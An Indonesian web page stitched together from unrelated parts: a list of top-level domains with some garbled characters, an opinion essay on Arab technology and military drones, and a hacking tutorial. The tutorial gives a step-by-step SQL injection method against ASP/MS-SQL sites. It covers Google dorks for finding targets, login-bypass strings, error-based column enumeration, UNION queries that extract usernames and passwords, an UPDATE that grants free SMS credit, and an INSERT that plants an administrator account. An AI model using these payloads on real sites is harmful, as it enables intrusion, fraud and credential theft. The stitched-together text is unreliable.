Nama Domain Berdasarkan Negara

 A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Ã…land
.az – Azerbaijan

B
.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgia *
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi *
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia *
.br – Brasil *
.bs – Bahama *
.bt – Bhutan
.bv – Pulau Bouvet (tidak dipakai dan tidak terdaftar)
.bw – Botswana
.by – Belarus
.bz – Belize *

C
.ca – Kanada
.cc – Pulau Cocos *
.cd – Republik Demokratik Kongo (dulunya .zr – Zaire) *
.cf – Republik Afrika Tengah
.cg – Republik Kongo *
.ch – Swiss *
.ci – Côte d’Ivoire (Pantai Gading)
.ck – Kepulauan Cook *
.cl – Chili
.cm – Kamerun
.cn – Republik Rakyat Tiongkok *
.co – Kolombia
.cr – Kosta Rika
.cs – Serbia dan Montenegro (dulunya .yu – Yugoslavia; Catatan: pada tanggal 3 Juni, 2006,    Montenegro mendeklarasikan kemerdekaannya, sehingga domain ini tidak dipakai lagi.) (kode domain .cs tidak dipakai, tidak ada DNS) (kode domain .cs dulunya dipakai untuk Cekoslowakia)
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Natal *
.cy – Siprus
.cz – Republik Ceko

D
.de – Jerman
.dj – Djibouti *
.dk – Denmark *
.dm – Dominika
.do – Republik Dominika
.dz – Aljazair (Algeria)

E
.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat (tidak dipakai; tidak ada DNS)
.er – Eritrea
.es – Spanyol *
.et – Ethiopia
.eu – Uni Eropa (kode domain yang “dikhususkan” oleh ISO 3166-1)

F
.fi – Finlandia
.fj – Fiji *
.fk – Kepulauan Falkland
.fm – Federasi Mikronesia *
.fo – Kepulauan Faroe
.fr – Perancis

G
.ga – Gabon
.gb – Britania Raya (Reserved domain by IANA; deprecated – see .uk)
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland *
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Guinea Khatulistiwa
.gr – Yunani *
.gs – Georgia Selatan dan Kepulauan Sandwich Selatan *
.gt – Guatemala
.gu – Guam
.gw – Guinea Bissau
.gy – Guyana

H
.hk – Hong Kong *
.hm – Pulau Heard dan Kepulauan McDonald *
.hn – Honduras *
.hr – Kroasia
.ht – Haiti
.hu – Hongaria *

I
.id – Indonesia
.ie – Republik Irlandia
.il – Israel *
.im – Pulau Man *
.in – India *
.io – Teritorial Britania di Samudra Hindia *
.iq – Irak
.ir – Iran *
.is – Islandia
.it – Italia

J
.je – Jersey
.jm – Jamaika
.jo – Yordania
.jp – Jepang

K
.ke – Kenya
.kg – Kirgizstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts dan Nevis
.kp – Korea Utara (tidak dipakai; tidak ada DNS)
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan *

L
.la – Laos *
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein *
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lituania
.lu – Luxemburg
.lv – Latvia *
.ly – Libya *

M
.ma – Maroko
.mc – Monako
.md – Moldova *
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Republik Makedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia *
.mo – Makau
.mp – Kepulauan Mariana Utara *
.mq – Martinique
.mr – Mauritania
.ms – Montserrat *
.mt – Malta
.mu – Mauritius *
.mv – Maladewa
.mw – Malawi *
.mx – Meksiko *
.my – Malaysia
.mz – Mozambik

N
.na – Namibia *
.nc – Kaledonia Baru
.ne – Niger
.nf – Pulau Norfolk *
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda * (ccTLD terdaftar pertama)
.no – Norwegia
.np – Nepal
.nr – Nauru *
.nu – Niue *
.nz – Selandia Baru *

O
.om – Oman

P
.pa – Panama
.pe – Peru
.pf – Polinesia Perancis
.pg – Papua Nugini
.ph – Filipina *
.pk – Pakistan *
.pl – Polandia *
.pm – Saint-Pierre dan Miquelon
.pn – Kepulauan Pitcairn *
.pr – Puerto Riko *
.ps – Otoritas Nasional Palestina *
.pt – Portugal *
.pw – Palau
.py – Paraguay

Q
.qa – Qatar

R
.re РR̩union
.ro – Rumania *
.rs – Serbia
.ru – Rusia *
.rw – Rwanda

S
.sa – Arab Saudi
.sb – Kepulauan Solomon *
.sc – Seychelles *
.sd – Sudan
.se – Swedia *
.sg – Singapura
.sh – Saint Helena *
.si – Slovenia
.sj – Svalbard dan Jan Mayen (tidak dipakai; tidak terdaftar)
.sk – Slowakia
.sl – Sierra Leone
.sm – San Marino *
.sn – Senegal
.so – Somalia *
.sr – Suriname *
.st – Sao Tome dan Principe *
.su – Uni Soviet (terdepresiasi; digantikan; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
.sv – El Salvador
.sy – Suriah *
.sz – Swaziland *

T
.tc – Kepulauan Turks dan Caicos
.td – Chad
.tf – Teritorial Perancis Selatan
.tg – Togo *
.th – Thailand
.tj – Tajikistan *
.tk – Tokelau *
.tl – Timor Leste (dulunya .tp) *
.tm – Turkmenistan *
.tn – Tunisia
.to – Tonga *
.tp – Timor Timur (terdepresiasi – gunakan .tl; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
.tr – Turki
.tt – Trinidad dan Tobago *
.tv – Tuvalu *
.tw – Republik China (Taiwan) *
.tz – Tanzania

U
.ua – Ukraina
.ug – Uganda *
.uk – Inggris (kode domain yang “dikhususkan” oleh ISO 3166-1) (lihat pula .gb)
.us – Amerika Serikat *
.uy – Uruguay
.uz – Uzbekistan

V
.va – Vatikan
.vc – Saint Vincent dan Grenadines *
.ve – Venezuela
.vg – Kepulauan Virgin Britania Raya *
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu *

W
.wf – Wallis dan Futuna
.ws – Samoa (dulunya Samoa Barat) *

Y
.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia (kemudian berganti nama menjadi Serbia dan Montenegro)

(kode domain secara resmi digantikan oleh .cs (lihat di atas) namun tetap dipakai; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)

Z
.za – Afrika Selatan *
.zm – Zambia
.zw – Zimbabwe

Tidak bersponsor
.biz .com .edu .gov .info .int .mil .name .net .org

Bersponsor
.aero .cat .coop .jobs .mobi .museum .pro .tel .travel

Infrastruktur
.arpa .root

Startup phase
.asia

Diusulkan
.berlin .bzh .cym .gal .geo .kid .kids .mail .nyc .post .sco .web .xxx

Dihapus
.nato

Dipesan
.example .invalid .localhost .test

Pseudo-domain
.bitnet .csnet .ip .local .onion .uucp

Bikin Roket, Jangan Bikin Puisi!

Bermodal status Facebook seorang kawan Indonesia yang menjadi pensyarah alias dosen di Malaysia, Endri Rachman, lahirlah tulisan ini…

Melalui status yang ditulisnya hari Senin, 5 Agustus 2013, mantan karyawan PT Nurtanio (sekarang PT Dirgantara Indonesia) itu mengingatkan kawan-kawan Fesbooker-nya untuk melihat apa yang sedang terjadi di Timur Tengah, di mana orang-orang dan negara Arab banyak di-bully oleh Barat. Di-bully, dihinakan, dan direndahkan, karena bangsa Arab dianggap tunateknologi yang membuat negeri mereka “terbelakang” meski bergelimang uang.

Dengan menyematkan satu berita Eramuslim.com sebagai dasar imbauannya, Endri menulis, akhirnya mereka (Arab) sadar tentang pentingnya mempelajari dan menguasai ilmu dan teknologi pertahanan dan militer, termasuk bagaimana caranya membuat dan mendesain pesawat terbang dan UAV (pesawat nirawak). “Sebuah peluang bisnis yang menjanjikan, mengajari mereka (Arab) bagaimana caranya mendesain pesawat terbang atau UAV itu,” katanya.

Landasan imbauan Endri yang dikenal sebagai ahli perancang dan pembuat UAV adalah itu tadi, sebuah berita Eramuslim.com berjudul Wahai Muslim, Buatlah Roket, Nuklir, Bom, dan Jangan Buat Puisi!

Inti tulisan sebenarnya sebuah gugatan kalau tidak mau dikatakan sebagai “pemberontakan” pemikiran terhadap keadaan dunia Arab yang terlena, yang kalah dalam perlombaan teknologi dibanding dunia Barat. Bahkan dibanding Iran yang telah berhasil mengembangkan teknologi nuklir, Arab sangat jauh tertinggal dalam urusan teknologi apalagi sampai menciptakan teknologi. Bukan sekadar membeli dan memanfaatkan teknologi yang dengan kekayaan berlimpah hal itu bisa dilakukan kapan saja. Di sisi lain, Barat senantiasa menjegal “lawan-lawan” potensial mereka menciptakan teknologi, khususnya teknologi nuklir.

Dalam hidup ini, tidak ada ruang untuk integritas. Integritas dan kesucian hanya milik langit, sementara hukum dunia dan politik didirikan di atas kebohongan dan kelicikan . Selama orang menerima untuk dikuasai oleh undang-undang manusia saat ini tanpa kehadiran undang-undang Allah, maka manuver kepentingan, perampasan, arogansi, penindasan akan terjadi.

Demikian Eramuslim.com menulis, membandingkan betapa munafiknya lima negara Barat (termasuk Israel) yang disebutnya memproduksi senjata nuklir dan bom atom, tetapi mereka melarang negara-negara lainnya du dunia ini untuk mendekati nuklir. “Kelima negara nuklir utama tidak ingin negara lain untuk memproduksi senjata nuklir sehingga mereka dapat mempertahankan hegemoni kekuatan mereka, wewenang dan tirani,” tulis Eramuslim.com lagi.

Sebagai seorang kawan, saya kemudian mengomentari status Endri tersebut dan saya katakan bahwa dunia Arab terlalu lelap dalam tidur panjangnya, dibuai kekayaan hasil minyak yang mungkin sebentar lagi juga akan habis. Soal teknologi, saya bilang, Arab kalah jauh dibanding Israel atau bahkan Iran. “Tidak ada kata terlambat untuk perbaikan, jangan sampai suatu hari kelak Arab diledek Iran dengan teknologi nuklirnya, sementara oleh Israel mungkin sudah taraf dihinakan,” komentar saya.

Sebagai ahli pembuat UAV di mana beberapa tahun lalu saya pernah menulis profilnya di Harian Kompas, Endri memang selalu bersemangat bila berdiskusi soal UAV. Dari sisi teknologi, terutama dirgantana, kata Endri, Indonesia bisa memainkan peranan. Tetapi yang menjadi masalah adalah bagaimana negara-negara Arab bersedia bekerja sama dengan Indonesia sehingga perpaduan dana yang berlimpah dari Arab dengan sumber daya manusia, pengalaman dan keahlian yang teruji dari Indonesia, bakal mendatangkan win-win solution jika kerja sama terealisasi. Memang saat bertemu Endri beberapa tahun lalu untuk sebuah wawancara, ia sedang menjajaki kemungkinan kerja sama dunia Arab-Indonesia untuk membuat pabrik pesawat nirawak berskala besar yang bisa dimanfaatkan untuk kepentingan bersama.

Bagi saya, penciptaan teknologi apapun, termasuk UAV, bergantung pada tujuan yang bisa saling bertolak belakang. Sama saja dengan teknologi nuklir itu sendiri, jika dimanfaatkan untuk menggerakkan energi listrik, menggerakkan kapal selam, dan menggantikan minyak bumi untuk tenaga industri, maka ia akan mendatangkan manfaat luar biasa bagi kemanusiaan. Menjadi mudlarat dan bahkan malapetaka jika teknologi bom nuklir dengan daya hancur beribu-ribu kali kekuatan bom atom yang pernah dijatuhkan di Hiroshima dan Nagasaki hanya untuk menghancurkan peradaban demi memenangi peperangan. Jika hasrat menguasai melalui teknologi bom nuklir ini diumbar, daya ledaknya bisa menghancurkan peradaban suatu bangsa.

Demikian juga dengan UAV atau pesawat nirawak, pesawat yang dikendalikan dari jarak berribu-ribu mil jauhnya. Amerika Serikat dan Israel dengan nafsu melenyapkan musuh-musuh yang mereka anggap “teroris”, melepas ratusan drone mematikan yang telah membunuh ribuan “musuh-musuh” mereka bahkan rakyat yang tidak berdosa.

Penggunaan UAV bersenjata yang mematikan atau drone dalam peperangan, mau tidak mau harus meredifinisi lagi makna “perang” sesungguhnya, khususnya di mata Amerika Serikat, Israel, dan sekutunya. Perang di sini tidak lagi menggunakan kekuatan armada bersenjata masif, artileri berat, pesawat tempur canggih dengan pilot tempur terbaik, atau pengintaian menggunakan kapal selam modern. Untuk menghancurkan lawan, cukup melepas drone yang dikendalikan lelaki bertubuh tambun di satu ruang apartemen sambil memainkan joystick. Atau merekrut anak-anak gamers untuk megendalikan drone dalam upaya mencari musuh, sampai memuntahkan peluru mematikan dengan sasaran manusia bernyawa dalam satu pijitan tombol pada joystickitu.

Soal heroisme, ini juga perlu diredefinisi. Apakah anak-anak tanggung atau pria pengangguran tambun yang mengendalikan drone dari suatu tempat dan berhasil membunuh ratusan nyawa orang tidak berdosa dalam satu serangan bisa dikatakan pahlawan? Apakah peran tentara pembunuh bisa digantikan oleh orang-orang sipil yang masih berkategori anak-anak? Apakah anak-anak pengendali drone ini bisa dibunuh oleh lawan karena sudah masuk ke kancah peperangan meski mereka mengendalikan drone dari sebuah ruangan sekolah, misalnya? Atau jangan-jangan tentara pemilik mesin perang drone itu yang layak disebut pecundang meski berhasil membunuh lawan dengan cara pengecut?

Saya bisa paham dengan niat Endri sebagai orang Indonesia tulen yang ingin menjalin kerja sama dengan dunia Arab berlimpah petro dollar untuk mengembangkan UAV beserta teknologi turunannya. Dengan cara memproduksi UAV atau bahkan drone, maka dunia Arab bisa mengimbangi kekuatan lawan. Memang tergantung niat, UAV bisa digunakan untuk memantau keamanan di perbatasan, mencari ladang minyak baru, dan bahkan untuk pertahanan jika diperlukan. Tetapi, mungkin dunia Arab belum merasa tertarik.

O, ya… kembali kepada tulisan Eramuslim.com tadi, meski di akhir judul tulisannya yang panjang terdapat perintah imperatif “Jangan buat Puisi”, namun pada kalimat penutup sang penulis Aidh Al Qarni, justru mengutip satu bait puisi karya penyair Khalaf Bin Hazal: “Jangan percaya dengan anaknya serigala walau induknya telah meninggal, karena mereka pasti akan datang kepada Anda di pagi hari dengan taring mereka”.

***

Cara Hack Website

 

Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
===============
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol